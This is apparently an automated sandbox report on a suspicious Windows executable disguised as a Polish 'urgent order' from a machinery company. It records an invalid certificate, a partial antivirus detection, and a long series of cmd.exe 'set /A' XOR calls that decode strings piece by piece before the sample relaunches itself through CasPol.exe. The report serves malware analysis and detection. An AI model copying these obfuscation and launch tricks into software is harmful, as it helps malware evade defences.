Windows Analysis Report
Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_00406344	1_2_00406344
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Code function: 1_2_0040488F	1_2_0040488F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 137_2_00B113D0	137_2_00B113D0

Source: Microsoft.Practices.Composite.UnityExtensions.dll.1.dr

Static PE information: No import functions for PE file found

Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13038087262.0000000002936000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameMicrosoft.Practices.Composite.UnityExtensions.dll\ vs Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Section loaded: havegangenes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll	Jump to behavior

Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Static PE information: invalid certificate

Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Virustotal: Detection: 32%

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

File read: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Source: Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x19^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x78^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x79^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"	Jump to behavior
